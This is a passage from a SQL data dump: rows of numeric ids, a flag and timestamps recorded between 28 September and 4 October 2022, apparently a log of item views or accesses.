03:28:47'),(60520,2297,1,'2022-09-28','2022-09-28 03:37:49'),(60521,4960,1,'2022-09-28','2022-09-28 07:03:33'),(60522,1711,1,'2022-09-28','2022-09-28 07:55:08'),(60523,4930,1,'2022-09-28','2022-09-28 08:17:38'),(60524,3479,1,'2022-09-28','2022-09-28 08:49:51'),(60525,4396,1,'2022-09-28','2022-09-28 09:34:47'),(60526,1608,1,'2022-09-28','2022-09-28 09:35:33'),(60527,3030,1,'2022-09-28','2022-09-28 09:56:28'),(60528,1608,1,'2022-09-28','2022-09-28 11:01:43'),(60529,1594,1,'2022-09-28','2022-09-28 11:05:57'),(60530,5137,1,'2022-09-28','2022-09-28 11:17:44'),(60531,3489,1,'2022-09-28','2022-09-28 11:18:57'),(60532,3486,1,'2022-09-28','2022-09-28 11:19:37'),(60533,3038,1,'2022-09-28','2022-09-28 11:20:19'),(60534,1582,1,'2022-09-28','2022-09-28 11:34:27'),(60535,4457,1,'2022-09-28','2022-09-28 12:01:23'),(60536,4301,1,'2022-09-28','2022-09-28 12:43:32'),(60537,4612,1,'2022-09-28','2022-09-28 12:54:21'),(60538,1870,1,'2022-09-28','2022-09-28 13:57:55'),(60539,1870,1,'2022-09-28','2022-09-28 13:59:03'),(60540,1872,1,'2022-09-28','2022-09-28 13:59:19'),(60541,1877,1,'2022-09-28','2022-09-28 13:59:33'),(60542,4963,1,'2022-09-28','2022-09-28 14:00:45'),(60543,87,1,'2022-09-28','2022-09-28 14:01:13'),(60544,76,1,'2022-09-28','2022-09-28 14:01:41'),(60545,1594,1,'2022-09-28','2022-09-28 14:02:06'),(60546,4963,1,'2022-09-28','2022-09-28 14:02:15'),(60547,68,1,'2022-09-28','2022-09-28 14:02:58'),(60548,1877,1,'2022-09-28','2022-09-28 14:03:17'),(60549,3664,1,'2022-09-28','2022-09-28 14:03:54'),(60550,3102,1,'2022-09-28','2022-09-28 14:09:34'),(60551,91,1,'2022-09-28','2022-09-28 14:11:25'),(60552,1588,1,'2022-09-28','2022-09-28 14:48:29'),(60553,68,1,'2022-09-28','2022-09-28 14:49:30'),(60554,1722,1,'2022-09-28','2022-09-28 14:57:53'),(60555,1722,1,'2022-09-28','2022-09-28 15:01:49'),(60556,4457,1,'2022-09-28','2022-09-28 15:48:02'),(60557,3731,1,'2022-09-28','2022-09-28 15:59:22'),(60558,468,1,'2022-09-28','2022-09-28 16:33:01'),(60559,4618,1,'2022-09-28','2022-09-28 16:45:49'),(60560,4911,1,'2022-09-28','2022-09-28 16:47:19'),(60561,1582,1,'2022-09-28','2022-09-28 17:08:58'),(60562,4396,1,'2022-09-28','2022-09-28 17:32:11'),(60563,2457,1,'2022-09-28','2022-09-28 18:10:42'),(60564,3479,1,'2022-09-28','2022-09-28 18:55:11'),(60565,1608,1,'2022-09-28','2022-09-28 19:16:39'),(60566,1604,1,'2022-09-28','2022-09-28 19:36:42'),(60567,2159,1,'2022-09-28','2022-09-28 19:42:43'),(60568,108,1,'2022-09-28','2022-09-28 20:36:44'),(60569,4911,1,'2022-09-28','2022-09-28 20:53:28'),(60570,3691,1,'2022-09-28','2022-09-28 21:02:37'),(60571,3030,1,'2022-09-28','2022-09-28 21:08:11'),(60572,5125,1,'2022-09-28','2022-09-28 21:24:08'),(60573,1606,1,'2022-09-28','2022-09-28 21:31:22'),(60574,1606,1,'2022-09-28','2022-09-28 21:31:24'),(60575,4542,1,'2022-09-28','2022-09-28 21:56:37'),(60576,5140,1,'2022-09-28','2022-09-28 22:04:07'),(60577,2804,1,'2022-09-28','2022-09-28 22:47:21'),(60578,4436,1,'2022-09-28','2022-09-28 23:12:46'),(60579,4498,1,'2022-09-28','2022-09-28 23:38:08'),(60580,4498,1,'2022-09-28','2022-09-28 23:38:27'),(60581,5005,1,'2022-09-29','2022-09-29 00:18:15'),(60582,2159,1,'2022-09-29','2022-09-29 00:48:02'),(60583,2159,1,'2022-09-29','2022-09-29 00:48:40'),(60584,2159,1,'2022-09-29','2022-09-29 00:48:47'),(60585,2159,1,'2022-09-29','2022-09-29 00:49:04'),(60586,2159,1,'2022-09-29','2022-09-29 00:49:17'),(60587,2159,1,'2022-09-29','2022-09-29 00:49:51'),(60588,2159,1,'2022-09-29','2022-09-29 01:25:04'),(60589,2159,1,'2022-09-29','2022-09-29 01:25:43'),(60590,2154,1,'2022-09-29','2022-09-29 01:58:48'),(60591,1610,1,'2022-09-29','2022-09-29 02:02:37'),(60592,4551,1,'2022-09-29','2022-09-29 02:04:26'),(60593,1588,1,'2022-09-29','2022-09-29 02:06:38'),(60594,1582,1,'2022-09-29','2022-09-29 03:49:26'),(60595,3290,1,'2022-09-29','2022-09-29 05:00:50'),(60596,68,1,'2022-09-29','2022-09-29 05:22:41'),(60597,5140,1,'2022-09-29','2022-09-29 06:17:11'),(60598,1544,1,'2022-09-29','2022-09-29 06:18:10'),(60599,4542,1,'2022-09-29','2022-09-29 06:43:54'),(60600,4980,1,'2022-09-29','2022-09-29 07:09:40'),(60601,3251,1,'2022-09-29','2022-09-29 09:05:17'),(60602,1582,1,'2022-09-29','2022-09-29 09:06:55'),(60603,91,1,'2022-09-29','2022-09-29 09:07:15'),(60604,5024,1,'2022-09-29','2022-09-29 09:08:15'),(60605,4436,1,'2022-09-29','2022-09-29 10:02:41'),(60606,1596,1,'2022-09-29','2022-09-29 10:08:56'),(60607,3251,1,'2022-09-29','2022-09-29 11:10:09'),(60608,3534,1,'2022-09-29','2022-09-29 11:15:28'),(60609,4966,1,'2022-09-29','2022-09-29 11:25:27'),(60610,3083,1,'2022-09-29','2022-09-29 11:42:32'),(60611,1544,1,'2022-09-29','2022-09-29 11:54:38'),(60612,2804,1,'2022-09-29','2022-09-29 12:10:21'),(60613,1544,1,'2022-09-29','2022-09-29 12:13:35'),(60614,1544,1,'2022-09-29','2022-09-29 12:15:57'),(60615,1715,1,'2022-09-29','2022-09-29 12:18:04'),(60616,1596,1,'2022-09-29','2022-09-29 12:32:28'),(60617,3030,1,'2022-09-29','2022-09-29 12:33:56'),(60618,1586,1,'2022-09-29','2022-09-29 13:10:52'),(60619,2159,1,'2022-09-29','2022-09-29 14:20:13'),(60620,2309,1,'2022-09-29','2022-09-29 14:39:44'),(60621,3764,1,'2022-09-29','2022-09-29 14:50:01'),(60622,5005,1,'2022-09-29','2022-09-29 14:52:01'),(60623,2775,1,'2022-09-29','2022-09-29 15:35:46'),(60624,1594,1,'2022-09-29','2022-09-29 15:56:57'),(60625,1594,1,'2022-09-29','2022-09-29 16:01:35'),(60626,472,1,'2022-09-29','2022-09-29 17:20:37'),(60627,4542,1,'2022-09-29','2022-09-29 18:04:17'),(60628,1600,1,'2022-09-29','2022-09-29 18:51:11'),(60629,3263,1,'2022-09-29','2022-09-29 19:34:08'),(60630,1610,1,'2022-09-29','2022-09-29 20:37:22'),(60631,1610,1,'2022-09-29','2022-09-29 20:37:23'),(60632,1610,1,'2022-09-29','2022-09-29 20:37:32'),(60633,1586,1,'2022-09-29','2022-09-29 21:25:57'),(60634,1724,1,'2022-09-29','2022-09-29 21:48:24'),(60635,4738,1,'2022-09-29','2022-09-29 23:20:29'),(60636,4738,1,'2022-09-29','2022-09-29 23:21:40'),(60637,1877,1,'2022-09-29','2022-09-29 23:52:13'),(60638,1610,1,'2022-09-30','2022-09-30 00:04:30'),(60639,3313,1,'2022-09-30','2022-09-30 00:30:46'),(60640,4444,1,'2022-09-30','2022-09-30 01:15:44'),(60641,72,1,'2022-09-30','2022-09-30 01:18:54'),(60642,3297,1,'2022-09-30','2022-09-30 02:08:24'),(60643,1544,1,'2022-09-30','2022-09-30 02:10:47'),(60644,4930,1,'2022-09-30','2022-09-30 03:04:51'),(60645,1604,1,'2022-09-30','2022-09-30 03:38:28'),(60646,4966,1,'2022-09-30','2022-09-30 04:22:42'),(60647,4750,1,'2022-09-30','2022-09-30 04:34:53'),(60648,4966,1,'2022-09-30','2022-09-30 04:58:50'),(60649,1877,1,'2022-09-30','2022-09-30 05:08:36'),(60650,1592,1,'2022-09-30','2022-09-30 05:41:33'),(60651,68,1,'2022-09-30','2022-09-30 05:42:02'),(60652,4747,1,'2022-09-30','2022-09-30 06:04:50'),(60653,486,1,'2022-09-30','2022-09-30 06:05:10'),(60654,1722,1,'2022-09-30','2022-09-30 07:17:46'),(60655,1722,1,'2022-09-30','2022-09-30 07:19:28'),(60656,1722,1,'2022-09-30','2022-09-30 07:21:32'),(60657,1870,1,'2022-09-30','2022-09-30 07:34:53'),(60658,5005,1,'2022-09-30','2022-09-30 07:36:00'),(60659,5101,1,'2022-09-30','2022-09-30 08:34:19'),(60660,87,1,'2022-09-30','2022-09-30 08:48:24'),(60661,1600,1,'2022-09-30','2022-09-30 08:50:16'),(60662,4938,1,'2022-09-30','2022-09-30 08:59:31'),(60663,4938,1,'2022-09-30','2022-09-30 09:00:02'),(60664,1724,1,'2022-09-30','2022-09-30 09:02:20'),(60665,4827,1,'2022-09-30','2022-09-30 09:35:05'),(60666,4622,1,'2022-09-30','2022-09-30 09:53:38'),(60667,1586,1,'2022-09-30','2022-09-30 10:04:07'),(60668,1877,1,'2022-09-30','2022-09-30 10:49:09'),(60669,72,1,'2022-09-30','2022-09-30 11:51:47'),(60670,4323,1,'2022-09-30','2022-09-30 12:19:40'),(60671,2309,1,'2022-09-30','2022-09-30 12:45:43'),(60672,2309,1,'2022-09-30','2022-09-30 12:49:45'),(60673,2297,1,'2022-09-30','2022-09-30 13:03:28'),(60674,84,1,'2022-09-30','2022-09-30 13:22:25'),(60675,84,1,'2022-09-30','2022-09-30 13:24:07'),(60676,91,1,'2022-09-30','2022-09-30 13:24:19'),(60677,84,1,'2022-09-30','2022-09-30 13:27:27'),(60678,3090,1,'2022-09-30','2022-09-30 14:51:45'),(60679,1722,1,'2022-09-30','2022-09-30 15:00:19'),(60680,1722,1,'2022-09-30','2022-09-30 15:00:38'),(60681,1722,1,'2022-09-30','2022-09-30 15:01:14'),(60682,3063,1,'2022-09-30','2022-09-30 15:01:23'),(60683,1722,1,'2022-09-30','2022-09-30 15:01:37'),(60684,3109,1,'2022-09-30','2022-09-30 15:37:14'),(60685,1588,1,'2022-09-30','2022-09-30 15:55:09'),(60686,3030,1,'2022-09-30','2022-09-30 16:14:26'),(60687,1778,1,'2022-09-30','2022-09-30 16:31:13'),(60688,2309,1,'2022-09-30','2022-09-30 16:39:21'),(60689,2309,1,'2022-09-30','2022-09-30 16:40:13'),(60690,2309,1,'2022-09-30','2022-09-30 16:40:50'),(60691,87,1,'2022-09-30','2022-09-30 16:41:46'),(60692,91,1,'2022-09-30','2022-09-30 16:42:09'),(60693,91,1,'2022-09-30','2022-09-30 16:48:41'),(60694,2309,1,'2022-09-30','2022-09-30 16:50:28'),(60695,3102,1,'2022-09-30','2022-09-30 17:49:18'),(60696,2503,1,'2022-09-30','2022-09-30 18:05:15'),(60697,1728,1,'2022-09-30','2022-09-30 18:12:03'),(60698,4768,1,'2022-09-30','2022-09-30 18:52:19'),(60699,2419,1,'2022-09-30','2022-09-30 19:05:46'),(60700,108,1,'2022-09-30','2022-09-30 19:11:45'),(60701,1741,1,'2022-09-30','2022-09-30 19:19:14'),(60702,1612,1,'2022-09-30','2022-09-30 19:32:46'),(60703,1747,1,'2022-09-30','2022-09-30 19:46:23'),(60704,4323,1,'2022-09-30','2022-09-30 19:59:38'),(60705,3034,1,'2022-09-30','2022-09-30 20:02:33'),(60706,4654,1,'2022-09-30','2022-09-30 20:13:08'),(60707,4654,1,'2022-09-30','2022-09-30 20:13:13'),(60708,1600,1,'2022-10-01','2022-10-01 00:15:46'),(60709,4377,1,'2022-10-01','2022-10-01 00:56:02'),(60710,1588,1,'2022-10-01','2022-10-01 01:30:03'),(60711,3030,1,'2022-10-01','2022-10-01 02:23:33'),(60712,1728,1,'2022-10-01','2022-10-01 03:06:17'),(60713,3705,1,'2022-10-01','2022-10-01 03:28:51'),(60714,3066,1,'2022-10-01','2022-10-01 03:59:31'),(60715,89,1,'2022-10-01','2022-10-01 03:59:52'),(60716,4412,1,'2022-10-01','2022-10-01 04:26:58'),(60717,84,1,'2022-10-01','2022-10-01 05:01:51'),(60718,4608,1,'2022-10-01','2022-10-01 05:16:10'),(60719,80,1,'2022-10-01','2022-10-01 05:28:11'),(60720,3038,1,'2022-10-01','2022-10-01 05:36:38'),(60721,2617,1,'2022-10-01','2022-10-01 06:13:38'),(60722,4980,1,'2022-10-01','2022-10-01 08:50:42'),(60723,3030,1,'2022-10-01','2022-10-01 10:25:55'),(60724,4983,1,'2022-10-01','2022-10-01 10:41:46'),(60725,1604,1,'2022-10-01','2022-10-01 12:23:09'),(60726,5140,1,'2022-10-01','2022-10-01 13:52:50'),(60727,4412,1,'2022-10-01','2022-10-01 13:58:35'),(60728,1612,1,'2022-10-01','2022-10-01 14:14:56'),(60729,1728,1,'2022-10-01','2022-10-01 14:32:47'),(60730,3691,1,'2022-10-01','2022-10-01 15:08:49'),(60731,1602,1,'2022-10-01','2022-10-01 15:26:47'),(60732,4301,1,'2022-10-01','2022-10-01 15:37:45'),(60733,1612,1,'2022-10-01','2022-10-01 15:46:17'),(60734,4412,1,'2022-10-01','2022-10-01 15:52:10'),(60735,3764,1,'2022-10-01','2022-10-01 16:05:14'),(60736,3691,1,'2022-10-01','2022-10-01 16:43:41'),(60737,3724,1,'2022-10-01','2022-10-01 17:02:55'),(60738,4930,1,'2022-10-01','2022-10-01 17:28:50'),(60739,1544,1,'2022-10-01','2022-10-01 17:37:11'),(60740,102,1,'2022-10-01','2022-10-01 17:57:33'),(60741,4722,1,'2022-10-01','2022-10-01 18:29:20'),(60742,1726,1,'2022-10-01','2022-10-01 18:31:54'),(60743,91,1,'2022-10-01','2022-10-01 18:44:12'),(60744,1602,1,'2022-10-01','2022-10-01 18:45:00'),(60745,4870,1,'2022-10-01','2022-10-01 18:47:06'),(60746,91,1,'2022-10-01','2022-10-01 18:58:23'),(60747,467,1,'2022-10-01','2022-10-01 19:04:34'),(60748,5071,1,'2022-10-01','2022-10-01 19:55:17'),(60749,3102,1,'2022-10-01','2022-10-01 20:02:28'),(60750,1701,1,'2022-10-01','2022-10-01 20:10:13'),(60751,4883,1,'2022-10-01','2022-10-01 20:32:46'),(60752,91,1,'2022-10-01','2022-10-01 20:47:44'),(60753,4893,1,'2022-10-01','2022-10-01 20:48:16'),(60754,68,1,'2022-10-01','2022-10-01 20:49:01'),(60755,89,1,'2022-10-01','2022-10-01 20:49:46'),(60756,487,1,'2022-10-01','2022-10-01 20:50:12'),(60757,4930,1,'2022-10-01','2022-10-01 20:50:14'),(60758,72,1,'2022-10-01','2022-10-01 20:50:56'),(60759,5109,1,'2022-10-01','2022-10-01 20:52:29'),(60760,72,1,'2022-10-01','2022-10-01 20:54:56'),(60761,5119,1,'2022-10-01','2022-10-01 20:55:17'),(60762,72,1,'2022-10-01','2022-10-01 20:55:36'),(60763,5116,1,'2022-10-01','2022-10-01 20:55:49'),(60764,72,1,'2022-10-01','2022-10-01 20:56:04'),(60765,91,1,'2022-10-01','2022-10-01 20:58:02'),(60766,72,1,'2022-10-01','2022-10-01 20:58:59'),(60767,4930,1,'2022-10-01','2022-10-01 20:59:08'),(60768,68,1,'2022-10-01','2022-10-01 20:59:18'),(60769,91,1,'2022-10-01','2022-10-01 20:59:19'),(60770,4391,1,'2022-10-01','2022-10-01 21:02:12'),(60771,80,1,'2022-10-01','2022-10-01 22:54:17'),(60772,4412,1,'2022-10-01','2022-10-01 23:32:11'),(60773,3691,1,'2022-10-01','2022-10-01 23:38:57'),(60774,3764,1,'2022-10-01','2022-10-01 23:54:41'),(60775,4747,1,'2022-10-02','2022-10-02 00:08:15'),(60776,4980,1,'2022-10-02','2022-10-02 01:28:57'),(60777,3259,1,'2022-10-02','2022-10-02 01:34:17'),(60778,1749,1,'2022-10-02','2022-10-02 01:41:46'),(60779,472,1,'2022-10-02','2022-10-02 02:10:02'),(60780,4275,1,'2022-10-02','2022-10-02 02:20:20'),(60781,4874,1,'2022-10-02','2022-10-02 03:11:47'),(60782,5125,1,'2022-10-02','2022-10-02 04:02:01'),(60783,1612,1,'2022-10-02','2022-10-02 04:51:00'),(60784,467,1,'2022-10-02','2022-10-02 05:37:36'),(60785,1544,1,'2022-10-02','2022-10-02 06:21:43'),(60786,3178,1,'2022-10-02','2022-10-02 06:31:27'),(60787,1870,1,'2022-10-02','2022-10-02 06:53:08'),(60788,2991,1,'2022-10-02','2022-10-02 07:00:46'),(60789,1586,1,'2022-10-02','2022-10-02 07:24:33'),(60790,91,1,'2022-10-02','2022-10-02 07:25:11'),(60791,1594,1,'2022-10-02','2022-10-02 09:27:01'),(60792,2609,1,'2022-10-02','2022-10-02 09:32:20'),(60793,3691,1,'2022-10-02','2022-10-02 09:46:37'),(60794,4412,1,'2022-10-02','2022-10-02 10:01:36'),(60795,472,1,'2022-10-02','2022-10-02 10:23:09'),(60796,1612,1,'2022-10-02','2022-10-02 11:15:43'),(60797,4963,1,'2022-10-02','2022-10-02 11:24:28'),(60798,467,1,'2022-10-02','2022-10-02 12:38:23'),(60799,4911,1,'2022-10-02','2022-10-02 12:41:37'),(60800,2609,1,'2022-10-02','2022-10-02 12:54:52'),(60801,2609,1,'2022-10-02','2022-10-02 12:55:11'),(60802,2609,1,'2022-10-02','2022-10-02 12:55:31'),(60803,76,1,'2022-10-02','2022-10-02 12:56:05'),(60804,91,1,'2022-10-02','2022-10-02 12:56:18'),(60805,4878,1,'2022-10-02','2022-10-02 12:57:25'),(60806,4878,1,'2022-10-02','2022-10-02 12:57:27'),(60807,2609,1,'2022-10-02','2022-10-02 13:09:59'),(60808,4878,1,'2022-10-02','2022-10-02 13:15:14'),(60809,4301,1,'2022-10-02','2022-10-02 13:51:26'),(60810,4301,1,'2022-10-02','2022-10-02 13:52:23'),(60811,1592,1,'2022-10-02','2022-10-02 14:13:27'),(60812,3764,1,'2022-10-02','2022-10-02 14:15:31'),(60813,3764,1,'2022-10-02','2022-10-02 14:19:07'),(60814,3764,1,'2022-10-02','2022-10-02 14:19:24'),(60815,3102,1,'2022-10-02','2022-10-02 14:40:07'),(60816,1612,1,'2022-10-02','2022-10-02 15:23:13'),(60817,4238,1,'2022-10-02','2022-10-02 15:47:22'),(60818,91,1,'2022-10-02','2022-10-02 15:49:27'),(60819,1586,1,'2022-10-02','2022-10-02 15:49:28'),(60820,1722,1,'2022-10-02','2022-10-02 16:34:21'),(60821,72,1,'2022-10-02','2022-10-02 17:13:38'),(60822,91,1,'2022-10-02','2022-10-02 17:14:51'),(60823,4542,1,'2022-10-02','2022-10-02 17:17:54'),(60824,91,1,'2022-10-02','2022-10-02 17:19:08'),(60825,4357,1,'2022-10-02','2022-10-02 17:20:35'),(60826,4622,1,'2022-10-02','2022-10-02 17:22:46'),(60827,1722,1,'2022-10-02','2022-10-02 17:24:00'),(60828,1722,1,'2022-10-02','2022-10-02 17:24:09'),(60829,1722,1,'2022-10-02','2022-10-02 17:24:21'),(60830,4930,1,'2022-10-02','2022-10-02 17:24:43'),(60831,1722,1,'2022-10-02','2022-10-02 17:24:59'),(60832,1722,1,'2022-10-02','2022-10-02 17:25:18'),(60833,3691,1,'2022-10-02','2022-10-02 17:38:09'),(60834,4622,1,'2022-10-02','2022-10-02 17:42:48'),(60835,4341,1,'2022-10-02','2022-10-02 18:10:54'),(60836,1722,1,'2022-10-02','2022-10-02 18:14:47'),(60837,1722,1,'2022-10-02','2022-10-02 18:14:57'),(60838,1612,1,'2022-10-02','2022-10-02 18:44:13'),(60839,1544,1,'2022-10-02','2022-10-02 18:49:31'),(60840,3486,1,'2022-10-02','2022-10-02 19:20:09'),(60841,4412,1,'2022-10-02','2022-10-02 19:56:18'),(60842,4338,1,'2022-10-02','2022-10-02 20:10:13'),(60843,5033,1,'2022-10-02','2022-10-02 20:14:09'),(60844,5071,1,'2022-10-02','2022-10-02 20:48:33'),(60845,3117,1,'2022-10-02','2022-10-02 21:21:17'),(60846,3781,1,'2022-10-02','2022-10-02 21:37:28'),(60847,80,1,'2022-10-02','2022-10-02 21:53:55'),(60848,4938,1,'2022-10-02','2022-10-02 22:42:47'),(60849,4341,1,'2022-10-02','2022-10-02 23:34:42'),(60850,1610,1,'2022-10-03','2022-10-03 00:00:12'),(60851,1722,1,'2022-10-03','2022-10-03 00:10:07'),(60852,1870,1,'2022-10-03','2022-10-03 01:00:29'),(60853,1612,1,'2022-10-03','2022-10-03 01:17:37'),(60854,4960,1,'2022-10-03','2022-10-03 01:27:49'),(60855,4960,1,'2022-10-03','2022-10-03 01:29:36'),(60856,3282,1,'2022-10-03','2022-10-03 01:55:56'),(60857,3282,1,'2022-10-03','2022-10-03 01:56:08'),(60858,3282,1,'2022-10-03','2022-10-03 01:56:19'),(60859,3282,1,'2022-10-03','2022-10-03 01:56:33'),(60860,3282,1,'2022-10-03','2022-10-03 01:56:59'),(60861,3691,1,'2022-10-03','2022-10-03 02:09:22'),(60862,4520,1,'2022-10-03','2022-10-03 02:35:04'),(60863,4444,1,'2022-10-03','2022-10-03 03:01:13'),(60864,3534,1,'2022-10-03','2022-10-03 03:27:05'),(60865,1604,1,'2022-10-03','2022-10-03 03:53:08'),(60866,4983,1,'2022-10-03','2022-10-03 05:27:02'),(60867,2813,1,'2022-10-03','2022-10-03 06:25:01'),(60868,1726,1,'2022-10-03','2022-10-03 06:44:02'),(60869,1726,1,'2022-10-03','2022-10-03 06:44:25'),(60870,80,1,'2022-10-03','2022-10-03 06:56:23'),(60871,4976,1,'2022-10-03','2022-10-03 07:07:24'),(60872,1737,1,'2022-10-03','2022-10-03 07:14:12'),(60873,1737,1,'2022-10-03','2022-10-03 07:14:31'),(60874,1737,1,'2022-10-03','2022-10-03 07:14:57'),(60875,1737,1,'2022-10-03','2022-10-03 07:15:36'),(60876,5125,1,'2022-10-03','2022-10-03 07:38:51'),(60877,3006,1,'2022-10-03','2022-10-03 08:06:17'),(60878,1544,1,'2022-10-03','2022-10-03 08:20:11'),(60879,3781,1,'2022-10-03','2022-10-03 08:46:23'),(60880,5140,1,'2022-10-03','2022-10-03 08:55:37'),(60881,3127,1,'2022-10-03','2022-10-03 09:12:28'),(60882,4963,1,'2022-10-03','2022-10-03 09:41:25'),(60883,3691,1,'2022-10-03','2022-10-03 10:04:35'),(60884,87,1,'2022-10-03','2022-10-03 10:15:59'),(60885,2775,1,'2022-10-03','2022-10-03 10:17:00'),(60886,2748,1,'2022-10-03','2022-10-03 10:20:52'),(60887,2617,1,'2022-10-03','2022-10-03 10:23:27'),(60888,1728,1,'2022-10-03','2022-10-03 10:27:40'),(60889,2748,1,'2022-10-03','2022-10-03 10:38:27'),(60890,487,1,'2022-10-03','2022-10-03 10:39:01'),(60891,4963,1,'2022-10-03','2022-10-03 10:39:05'),(60892,486,1,'2022-10-03','2022-10-03 10:39:49'),(60893,487,1,'2022-10-03','2022-10-03 10:40:09'),(60894,486,1,'2022-10-03','2022-10-03 10:41:01'),(60895,487,1,'2022-10-03','2022-10-03 10:41:06'),(60896,487,1,'2022-10-03','2022-10-03 10:42:20'),(60897,486,1,'2022-10-03','2022-10-03 10:46:30'),(60898,487,1,'2022-10-03','2022-10-03 10:46:56'),(60899,2558,1,'2022-10-03','2022-10-03 10:48:58'),(60900,5071,1,'2022-10-03','2022-10-03 10:53:28'),(60901,87,1,'2022-10-03','2022-10-03 11:03:04'),(60902,2775,1,'2022-10-03','2022-10-03 11:04:29'),(60903,87,1,'2022-10-03','2022-10-03 11:09:12'),(60904,87,1,'2022-10-03','2022-10-03 11:10:08'),(60905,4448,1,'2022-10-03','2022-10-03 11:11:21'),(60906,4396,1,'2022-10-03','2022-10-03 11:15:08'),(60907,4391,1,'2022-10-03','2022-10-03 11:19:34'),(60908,4373,1,'2022-10-03','2022-10-03 11:28:08'),(60909,87,1,'2022-10-03','2022-10-03 11:31:40'),(60910,1596,1,'2022-10-03','2022-10-03 12:18:21'),(60911,1582,1,'2022-10-03','2022-10-03 12:58:02'),(60912,4938,1,'2022-10-03','2022-10-03 13:06:44'),(60913,76,1,'2022-10-03','2022-10-03 13:12:03'),(60914,76,1,'2022-10-03','2022-10-03 13:13:00'),(60915,1872,1,'2022-10-03','2022-10-03 13:13:40'),(60916,84,1,'2022-10-03','2022-10-03 13:14:05'),(60917,91,1,'2022-10-03','2022-10-03 13:14:50'),(60918,4612,1,'2022-10-03','2022-10-03 13:17:44'),(60919,470,1,'2022-10-03','2022-10-03 13:32:54'),(60920,1608,1,'2022-10-03','2022-10-03 13:46:41'),(60921,1726,1,'2022-10-03','2022-10-03 14:19:52'),(60922,5005,1,'2022-10-03','2022-10-03 14:56:40'),(60923,2178,1,'2022-10-03','2022-10-03 14:59:37'),(60924,2178,1,'2022-10-03','2022-10-03 15:01:06'),(60925,2178,1,'2022-10-03','2022-10-03 15:01:58'),(60926,2178,1,'2022-10-03','2022-10-03 15:02:30'),(60927,2178,1,'2022-10-03','2022-10-03 15:03:50'),(60928,1588,1,'2022-10-03','2022-10-03 15:27:37'),(60929,5134,1,'2022-10-03','2022-10-03 15:33:50'),(60930,1602,1,'2022-10-03','2022-10-03 15:53:24'),(60931,84,1,'2022-10-03','2022-10-03 15:54:51'),(60932,3694,1,'2022-10-03','2022-10-03 15:55:50'),(60933,1588,1,'2022-10-03','2022-10-03 15:56:08'),(60934,4930,1,'2022-10-03','2022-10-03 15:57:44'),(60935,91,1,'2022-10-03','2022-10-03 15:58:15'),(60936,76,1,'2022-10-03','2022-10-03 16:00:50'),(60937,91,1,'2022-10-03','2022-10-03 16:01:46'),(60938,4930,1,'2022-10-03','2022-10-03 16:01:52'),(60939,3694,1,'2022-10-03','2022-10-03 16:02:00'),(60940,84,1,'2022-10-03','2022-10-03 16:02:02'),(60941,1602,1,'2022-10-03','2022-10-03 16:02:06'),(60942,2148,1,'2022-10-03','2022-10-03 16:02:44'),(60943,4874,1,'2022-10-03','2022-10-03 16:03:37'),(60944,1715,1,'2022-10-03','2022-10-03 16:23:10'),(60945,4635,1,'2022-10-03','2022-10-03 16:23:59'),(60946,80,1,'2022-10-03','2022-10-03 16:46:29'),(60947,1726,1,'2022-10-03','2022-10-03 17:22:40'),(60948,4938,1,'2022-10-03','2022-10-03 17:22:48'),(60949,5028,1,'2022-10-03','2022-10-03 17:26:43'),(60950,5028,1,'2022-10-03','2022-10-03 17:26:45'),(60951,3781,1,'2022-10-03','2022-10-03 17:31:30'),(60952,1582,1,'2022-10-03','2022-10-03 17:42:37'),(60953,1722,1,'2022-10-03','2022-10-03 17:44:02'),(60954,3691,1,'2022-10-03','2022-10-03 17:53:59'),(60955,1582,1,'2022-10-03','2022-10-03 17:55:33'),(60956,80,1,'2022-10-03','2022-10-03 17:55:43'),(60957,1582,1,'2022-10-03','2022-10-03 17:58:17'),(60958,1582,1,'2022-10-03','2022-10-03 17:58:44'),(60959,3102,1,'2022-10-03','2022-10-03 18:06:29'),(60960,1544,1,'2022-10-03','2022-10-03 18:13:51'),(60961,91,1,'2022-10-03','2022-10-03 18:14:24'),(60962,335,1,'2022-10-03','2022-10-03 18:16:04'),(60963,91,1,'2022-10-03','2022-10-03 18:16:32'),(60964,1544,1,'2022-10-03','2022-10-03 18:16:36'),(60965,4457,1,'2022-10-03','2022-10-03 18:54:59'),(60966,2410,1,'2022-10-03','2022-10-03 19:08:10'),(60967,3534,1,'2022-10-03','2022-10-03 19:24:00'),(60968,91,1,'2022-10-03','2022-10-03 19:49:59'),(60969,5080,1,'2022-10-03','2022-10-03 19:51:18'),(60970,5076,1,'2022-10-03','2022-10-03 19:51:19'),(60971,5140,1,'2022-10-03','2022-10-03 19:51:19'),(60972,91,1,'2022-10-03','2022-10-03 20:09:06'),(60973,4938,1,'2022-10-03','2022-10-03 20:17:08'),(60974,335,1,'2022-10-03','2022-10-03 20:18:17'),(60975,91,1,'2022-10-03','2022-10-03 20:59:48'),(60976,468,1,'2022-10-03','2022-10-03 21:44:49'),(60977,468,1,'2022-10-03','2022-10-03 22:38:30'),(60978,87,1,'2022-10-03','2022-10-03 22:50:36'),(60979,4668,1,'2022-10-03','2022-10-03 23:33:46'),(60980,4691,1,'2022-10-03','2022-10-03 23:33:50'),(60981,1544,1,'2022-10-03','2022-10-03 23:33:53'),(60982,4416,1,'2022-10-03','2022-10-03 23:50:07'),(60983,1600,1,'2022-10-04','2022-10-04 00:22:08'),(60984,1600,1,'2022-10-04','2022-10-04 00:22:11'),(60985,1594,1,'2022-10-04','2022-10-04 01:07:31'),(60986,1594,1,'2022-10-04','2022-10-04 01:07:31'),(60987,1594,1,'2022-10-04','2022-10-04 01:07:32'),(60988,1544,1,'2022-10-04','2022-10-04 01:26:28'),(60989,68,1,'2022-10-04','2022-10-04 01:40:07'),(60990,2410,1,'2022-10-04','2022-10-04 01:51:37'),(60991,1604,1,'2022-10-04','2022-10-04 02:14:07'),(60992,4546,1,'2022-10-04','2022-10-04 02:29:55'),(60993,4983,1,'2022-10-04','2022-10-04 02:30:13'),(60994,3691,1,'2022-10-04','2022-10-04 03:22:28'),(60995,80,1,'2022-10-04','2022-10-04 03:27:22'),(60996,3781,1,'2022-10-04','2022-10-04 03:40:06'),(60997,72,1,'2022-10-04','2022-10-04 03:49:05'),(60998,5113,1,'2022-10-04','2022-10-04 03:49:36'),(60999,5116,1,'2022-10-04','2022-10-04 03:49:40'),(61000,4971,1,'2022-10-04','2022-10-04 03:49:43'),(61001,5119,1,'2022-10-04','2022-10-04 03:49:47'),(61002,5001,1,'2022-10-04','2022-10-04 03:49:52'),(61003,4842,1,'2022-10-04','2022-10-04 03:49:56'),(61004,5109,1,'2022-10-04','2022-10-04 03:50:14'),(61005,4930,1,'2022-10-04','2022-10-04 